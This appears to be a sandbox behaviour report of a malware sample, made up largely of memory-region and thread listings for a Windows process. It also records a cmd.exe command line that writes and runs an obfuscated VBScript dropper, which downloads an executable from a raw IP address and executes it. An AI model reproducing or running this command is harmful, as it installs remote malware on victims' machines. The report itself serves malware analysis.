id = 3572
start_va = 0x3940000
end_va = 0x39bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003940000"
filename = ""
Region:
id = 3573
start_va = 0x4110000
end_va = 0x418ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004110000"
filename = ""
Region:
id = 3574
start_va = 0x5ca0000
end_va = 0x5d1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005ca0000"
filename = ""
Region:
id = 3575
start_va = 0x5d20000
end_va = 0x611ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005d20000"
filename = ""
Region:
id = 3576
start_va = 0x7fef8b10000
end_va = 0x7fef8b8bfff
entry_point = 0x7fef8b10000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Thread:
id = 113
os_tid = 0xbec
Thread:
id = 114
os_tid = 0xb64
Thread:
id = 115
os_tid = 0xb60
Thread:
id = 116
os_tid = 0xb5c
Thread:
id = 117
os_tid = 0xb58
Thread:
id = 118
os_tid = 0x298
Thread:
id = 119
os_tid = 0x150
Thread:
id = 120
os_tid = 0x460
Thread:
id = 121
os_tid = 0x7fc
Thread:
id = 122
os_tid = 0x7f4
Thread:
id = 123
os_tid = 0x7f0
Thread:
id = 124
os_tid = 0x7e4
Thread:
id = 125
os_tid = 0x790
Thread:
id = 126
os_tid = 0x774
Thread:
id = 127
os_tid = 0x75c
Thread:
id = 128
os_tid = 0x750
Thread:
id = 129
os_tid = 0x74c
Thread:
id = 130
os_tid = 0x71c
Thread:
id = 131
os_tid = 0x718
Thread:
id = 132
os_tid = 0x70c
Thread:
id = 133
os_tid = 0x6ec
Thread:
id = 134
os_tid = 0x4c0
Thread:
id = 135
os_tid = 0x498
Thread:
id = 136
os_tid = 0x494
Thread:
id = 137
os_tid = 0x484
Thread:
id = 138
os_tid = 0x480
Thread:
id = 139
os_tid = 0x474
Thread:
id = 140
os_tid = 0x1cc
Thread:
id = 141
os_tid = 0x120
Thread:
id = 142
os_tid = 0x3fc
Thread:
id = 143
os_tid = 0x3f0
Thread:
id = 144
os_tid = 0x3e4
Thread:
id = 145
os_tid = 0x398
Thread:
id = 146
os_tid = 0x394
Thread:
id = 147
os_tid = 0x390
Thread:
id = 148
os_tid = 0x384
Thread:
id = 149
os_tid = 0x378
Thread:
id = 150
os_tid = 0x370
Thread:
id = 151
os_tid = 0x7c8
Thread:
id = 154
os_tid = 0x840
Thread:
id = 209
os_tid = 0xb4c
Thread:
id = 210
os_tid = 0x7c0
Thread:
id = 215
os_tid = 0x5c4
Thread:
id = 216
os_tid = 0x8a8
Thread:
id = 217
os_tid = 0xbd4
Thread:
id = 218
os_tid = 0x67c
Thread:
id = 219
os_tid = 0x564
Thread:
id = 220
os_tid = 0x668
Thread:
id = 221
os_tid = 0x214
Thread:
id = 222
os_tid = 0x134
Thread:
id = 223
os_tid = 0x524
Thread:
id = 224
os_tid = 0x848
Thread:
id = 225
os_tid = 0x5ec
Thread:
id = 282
os_tid = 0x808
Thread:
id = 283
os_tid = 0xbfc
Thread:
id = 284
os_tid = 0x584
Thread:
id = 285
os_tid = 0x79c
Thread:
id = 286
os_tid = 0x740
Thread:
id = 287
os_tid = 0x888
Thread:
id = 297
os_tid = 0x4f4
Thread:
id = 364
os_tid = 0x4bc
Thread:
id = 371
os_tid = 0xbd8
Thread:
id = 372
os_tid = 0x558
Thread:
id = 410
os_tid = 0x630
Thread:
id = 411
os_tid = 0x9a0
Thread:
id = 412
os_tid = 0x77c
Thread:
id = 413
os_tid = 0x4fc
Thread:
id = 414
os_tid = 0x874
Process:
id = "7"
image_name = "cmd.exe"
filename = "c:\\windows\\syswow64\\cmd.exe"
page_root = "0x17dce000"
os_pid = "0x488"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0xbf0"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c CD %temp% & @echo set H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c = createobject(\"wscript.shell\") >ZMXZAA.vBS & @echo Dim X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x >>ZMXZAA.vBS & @echo Dim R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w >>ZMXZAA.vBS & @echo Dim B8yU2nW4oD3lW4vO1xP2nY9oR3e >>ZMXZAA.vBS & @echo Dim N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i >>ZMXZAA.vBS & @echo X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x = \"http://82.118.242.107/~able/1_ga/al/al.exe\" >>ZMXZAA.vBS & @echo R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w = \"JSTCHV.eXe\" >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = CreateObject(\"MSXML2.XMLHTTP\") >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.Open \"GET\", X3eH5tN6kV3tX2yS6cM8qZ5iV1oB0aR0nN5pF1kR1kJ7x, False >>ZMXZAA.vBS & @echo B8yU2nW4oD3lW4vO1xP2nY9oR3e.send (\"\") >>ZMXZAA.vBS & @echo If B8yU2nW4oD3lW4vO1xP2nY9oR3e.Status = 200 Then >>ZMXZAA.vBS & @echo Set N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i = CreateObject(\"ADODB.Stream\") >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Open >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Type = 1 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Write B8yU2nW4oD3lW4vO1xP2nY9oR3e.ResponseBody >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Position = 0 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.SaveToFile R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w, 2 >>ZMXZAA.vBS & @echo N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close >>ZMXZAA.vBS & @echo Set nE= Nothing >>ZMXZAA.vBS & @echo End If >>ZMXZAA.vBS & @echo Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing >>ZMXZAA.vBS & @echo WScript.Sleep(5000) >>ZMXZAA.VBs& @echo H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) >>ZMXZAA.vBS & sTaRt ZMXZAA.vbs "
cur_dir = "C:\\Windows\\system32\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1545
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1546
start_va = 0x30000
end_va = 0x32fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1547
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x40000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1548
start_va = 0x50000
end_va = 0x53fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1549
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1550
start_va = 0x90000
end_va = 0xcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 1551
start_va = 0x130000
end_va = 0x22ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 1552
start_va = 0x49de0000
end_va = 0x49e2bfff
entry_point = 0x49de0000
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")
Region:
id = 1553
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1554
start_va = 0x77e20000
end_va = 0x77f9ffff
entry_point = 0x77e20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1555
start_va = 0x7efb0000
end_va = 0x7efd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1556
start_va = 0x7efdb000
end_va = 0x7efddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1557
start_va = 0x7efde000
end_va = 0x7efdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1558
start_va = 0x7efdf000
end_va = 0x7efdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1559
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1560
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1561
start_va = 0x7fff0000
end_va = 0x7fffffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1562
start_va = 0x2a0000
end_va = 0x31ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002a0000"
filename = ""
Region:
id = 1563
start_va = 0x752a0000
end_va = 0x752a7fff
entry_point = 0x752a0000
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1564
start_va = 0x752b0000
end_va = 0x7530bfff
entry_point = 0x752b0000
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1565
start_va = 0x75310000
end_va = 0x7534efff
entry_point = 0x75310000
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1566
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1567
start_va = 0x230000
end_va = 0x296fff
entry_point = 0x230000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1568
start_va = 0x390000
end_va = 0x48ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 1569
start_va = 0x75f40000
end_va = 0x75f85fff
entry_point = 0x75f40000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1570
start_va = 0x76220000
end_va = 0x7632ffff
entry_point = 0x76220000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1571
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x0
region_type = private
name = "private_0x0000000077a20000"
filename = ""
Region:
id = 1572
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000077b20000"
filename = ""
Region:
id = 1573
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1574
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1584
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1585
start_va = 0x560000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000560000"
filename = ""
Region:
id = 1586
start_va = 0x735d0000
end_va = 0x735d6fff
entry_point = 0x735d0000
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll")
Region:
id = 1587
start_va = 0x75970000
end_va = 0x7597bfff
entry_point = 0x75970000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1588
start_va = 0x75980000
end_va = 0x759dffff
entry_point = 0x75980000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1589
start_va = 0x759e0000
end_va = 0x759f8fff
entry_point = 0x759e0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1590
start_va = 0x75a10000
end_va = 0x75abbfff
entry_point = 0x75a10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1591
start_va = 0x75fa0000
end_va = 0x7603cfff
entry_point = 0x75fa0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1592
start_va = 0x760d0000
end_va = 0x761bffff
entry_point = 0x760d0000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1593
start_va = 0x76490000
end_va = 0x7652ffff
entry_point = 0x76490000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1594
start_va = 0x76a70000
end_va = 0x76afffff
entry_point = 0x76a70000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1595
start_va = 0x77810000
end_va = 0x77819fff
entry_point = 0x77810000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1596
start_va = 0x77820000
end_va = 0x7791ffff
entry_point = 0x77820000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1597
start_va = 0x570000
end_va = 0x6f7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Region:
id = 1598
start_va = 0x75c00000
end_va = 0x75c5ffff
entry_point = 0x75c00000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1599
start_va = 0x75e50000
end_va = 0x75f1bfff
entry_point = 0x75e50000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1600
start_va = 0x30000
end_va = 0x36fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1601
start_va = 0x70000
end_va = 0x71fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 1602
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 1603
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1604
start_va = 0x700000
end_va = 0x880fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 1605
start_va = 0x890000
end_va = 0x1c8ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000890000"
filename = ""
Region:
id = 1606
start_va = 0x1c90000
end_va = 0x1fd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c90000"
filename = ""
Region:
id = 1607
start_va = 0x1fe0000
end_va = 0x20dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 1608
start_va = 0x76b00000
end_va = 0x77749fff
entry_point = 0x76b00000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1609
start_va = 0x75c60000
end_va = 0x75cb6fff
entry_point = 0x75c60000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1610
start_va = 0xe0000
end_va = 0xe1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1611
start_va = 0x74bb0000
end_va = 0x74d4dfff
entry_point = 0x74bb0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 1612
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0xf0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1613
start_va = 0x100000
end_va = 0x101fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1614
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 1615
start_va = 0x20e0000
end_va = 0x23aefff
entry_point = 0x20e0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1616
start_va = 0x510000
end_va = 0x54ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 1617
start_va = 0x23f0000
end_va = 0x24effff
entry_point = 0x0
region_type = private
name = "private_0x00000000023f0000"
filename = ""
Region:
id = 1618
start_va = 0x75cf0000
end_va = 0x75e4bfff
entry_point = 0x75cf0000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1619
start_va = 0x7efd8000
end_va = 0x7efdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1620
start_va = 0x2650000
end_va = 0x268ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002650000"
filename = ""
Region:
id = 1621
start_va = 0x75210000
end_va = 0x7528ffff
entry_point = 0x75210000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1622
start_va = 0x24f0000
end_va = 0x25cefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000024f0000"
filename = ""
Region:
id = 1623
start_va = 0x74fa0000
end_va = 0x75094fff
entry_point = 0x74fa0000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 1624
start_va = 0x76720000
end_va = 0x767aefff
entry_point = 0x76720000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1625
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1626
start_va = 0x76040000
end_va = 0x760c2fff
entry_point = 0x76040000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1627
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 1628
start_va = 0x74b80000
end_va = 0x74ba0fff
entry_point = 0x74b80000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll")
Region:
id = 1629
start_va = 0x76530000
end_va = 0x76574fff
entry_point = 0x76530000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll")
Region:
id = 1630
start_va = 0x330000
end_va = 0x34ffff
entry_point = 0x330000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db")
Region:
id = 1631
start_va = 0x350000
end_va = 0x350fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000350000"
filename = ""
Region:
id = 1632
start_va = 0x75950000
end_va = 0x7595afff
entry_point = 0x75950000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1633
start_va = 0x320000
end_va = 0x323fff
entry_point = 0x320000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1634
start_va = 0x360000
end_va = 0x38ffff
entry_point = 0x360000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db")
Region:
id = 1635
start_va = 0x490000
end_va = 0x493fff
entry_point = 0x490000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1636
start_va = 0x4a0000
end_va = 0x505fff
entry_point = 0x4a0000
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1637
start_va = 0x23b0000
end_va = 0x23effff
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 1638
start_va = 0x27d0000
end_va = 0x28cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 1639
start_va = 0x74b30000
end_va = 0x74b7bfff
entry_point = 0x74b30000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")
Region:
id = 1640
start_va = 0x7efd5000
end_va = 0x7efd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1641
start_va = 0x75f20000
end_va = 0x75f31fff
entry_point = 0x75f20000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 1642
start_va = 0x76580000
end_va = 0x7671cfff
entry_point = 0x76580000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 1643
start_va = 0x77750000
end_va = 0x77776fff
entry_point = 0x77750000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1644
start_va = 0x28d0000
end_va = 0x2cc2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000028d0000"
filename = ""
Region:
id = 1645
start_va = 0x2d30000
end_va = 0x2d6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d30000"
filename = ""
Region:
id = 1646
start_va = 0x2dc0000
end_va = 0x2ebffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002dc0000"
filename = ""
Region:
id = 1647
start_va = 0x74b00000
end_va = 0x74b2dfff
entry_point = 0x74b00000
region_type = mapped_file
name = "shdocvw.dll"
filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll")
Region:
id = 1648
start_va = 0x7efad000
end_va = 0x7efaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1649
start_va = 0x75ac0000
end_va = 0x75bf5fff
entry_point = 0x75ac0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 1650
start_va = 0x76330000
end_va = 0x7644cfff
entry_point = 0x76330000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 1651
start_va = 0x767e0000
end_va = 0x769dafff
entry_point = 0x767e0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 1652
start_va = 0x77800000
end_va = 0x7780bfff
entry_point = 0x77800000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 1653
start_va = 0x77920000
end_va = 0x77a14fff
entry_point = 0x77920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 1670
start_va = 0x2610000
end_va = 0x264ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002610000"
filename = ""
Region:
id = 1671
start_va = 0x26d0000
end_va = 0x27cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 1672
start_va = 0x7efaa000
end_va = 0x7efacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Thread:
id = 155
os_tid = 0x56c
[0077.727] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fecc | out: lpSystemTimeAsFileTime=0x22fecc*(dwLowDateTime=0xc1beb020, dwHighDateTime=0x1d48634))
[0077.727] GetCurrentProcessId () returned 0x488
[0077.727] GetCurrentThreadId () returned 0x56c
[0077.727] GetTickCount () returned 0x2166c
[0077.727] QueryPerformanceCounter (in: lpPerformanceCount=0x22fec4 | out: lpPerformanceCount=0x22fec4*=1815673700000) returned 1
